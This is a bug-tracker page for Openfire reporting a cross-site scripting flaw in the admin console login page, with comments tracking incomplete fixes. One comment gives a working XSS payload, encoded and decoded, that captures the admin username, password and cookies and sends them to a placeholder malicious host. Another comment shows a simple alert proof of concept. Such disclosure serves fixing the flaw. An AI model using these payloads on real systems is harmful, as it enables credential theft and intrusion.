Openfire

Cross-site scripting attack in the login form

Details

  • Type: Bug Bug
  • Status: Resolved Resolved
  • Priority: Blocker Blocker
  • Resolution: Fixed
  • Affects Version/s: 3.6.4
  • Fix Version/s: 3.7.0 beta
  • Component/s: Admin Console
  • Labels:
    None

Description

As reported by a community member, there is a cross-site scripting vulnerability in the login page of the admin console. Although it's unlikely to be exploited, it's important to get fixed.

Issue Links

This issue is related to:
JM-629 Additional cross-site scripting bugs in login Blocker Closed

Activity

Ascending order - Click to sort in descending order
Hide
Permalink
Matt Tucker added a comment -

Only the "user" param seemed to be vulnerable. If anyone else can find issues, please post them as comments.

Show
Matt Tucker added a comment - Only the "user" param seemed to be vulnerable. If anyone else can find issues, please post them as comments.
Hide
Permalink
Juan Carlos Calderon added a comment -

Hello guys

I'm affraid this issue was not completelly fixed. The problem still exists for "url" parameter and the fix implementation for "username" parameter is failed since a XSS attack without less-than-character,
like the following, is still working. The followgin attack imnplements a small function to steel admin credentials and send them to a (ficticious) malicious site, it is fully functional:
http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22

URL decoded
http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me="

Please check the following resource for more information of different possible attacks.
http://ha.ckers.org/xss.html

Regards,
JC

Show
Juan Carlos Calderon added a comment - Hello guys I'm affraid this issue was not completelly fixed. The problem still exists for "url" parameter and the fix implementation for "username" parameter is failed since a XSS attack without less-than-character, like the following, is still working. The followgin attack imnplements a small function to steel admin credentials and send them to a (ficticious) malicious site, it is fully functional: http://JiveServer:9090/login.jsp?username=%22+onchange%3D%27document.loginForm.onsubmit%3Drobit%3Bfunction+robit%28%29+%7Bvar+image%3Bimage+%3D+new+Image%28%29%3Bimage.src+%3D+%22http%3A%2F%2Fwww.malicioussite.com%2FGet.asp%3FUsuario%3D%22+%2B+loginForm.username.value+%2B+%22%26Password%3D%22+%2B+loginForm.password.value+%2B+%22%26cookies%3D%22+%2B+document.cookie%7D%27+me%3D%22 URL decoded http://JiveServer:9090/login.jsp?username=" onchange='document.loginForm.onsubmit=robit;function robit() {var image;image = new Image();image.src = "http://www.malicioussite.com/Get.asp?Usuario=" + loginForm.username.value + "&Password=" + loginForm.password.value + "&cookies=" + document.cookie}' me=" Please check the following resource for more information of different possible attacks. http://ha.ckers.org/xss.html Regards, JC
Hide
Permalink
davesan added a comment -

I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4 is still vulnerable to XSS.

e.g.,
http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=

Show
davesan added a comment - I looked around, but I didn't see anything more on this. It appears to be marked "fixed", but the admin console, as of version 3.6.4 is still vulnerable to XSS. e.g., http://../openfire/login.jsp?url=%2Findex.jsp&login=&username=%22%20onclick=%22alert(%27xss%27)&password=
Hide
Permalink
Daryl Herzmann added a comment -

reopening.

Show
Daryl Herzmann added a comment - reopening.
Hide
Permalink
Guus der Kinderen added a comment -

Fixed the XSS on the login screen.

Show
Guus der Kinderen added a comment - Fixed the XSS on the login screen.
Hide
Permalink
Yehuda Katz added a comment -

I am not sure the correct solution is to just strip these characters.
My understanding is that some of the characters that function strips could be valid username characters and while the likelyhood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug.

I would contribute a fix, but I am having some trouble getting eclipse to work, and since that is my editor of choice.

Show
Yehuda Katz added a comment - I am not sure the correct solution is to just strip these characters. My understanding is that some of the characters that function strips could be valid username characters and while the likelyhood of someone using them is low, I would hate to see functionality in the program arbitrarily broken to fix this bug. I would contribute a fix, but I am having some trouble getting eclipse to work, and since that is my editor of choice.

People

Vote (1)
Watch (3)

Dates

  • Created:
    Updated:
    Resolved:
Atlassian JIRA (v4.4.3#663-r165197) | Report a problem
Powered by a free Atlassian JIRA open source license for igniterealtime.org. Try JIRA - bug tracking software for your team.